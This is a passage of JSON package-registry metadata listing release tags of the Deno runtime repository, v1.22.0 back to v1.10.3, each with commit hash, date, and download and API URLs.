f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/rel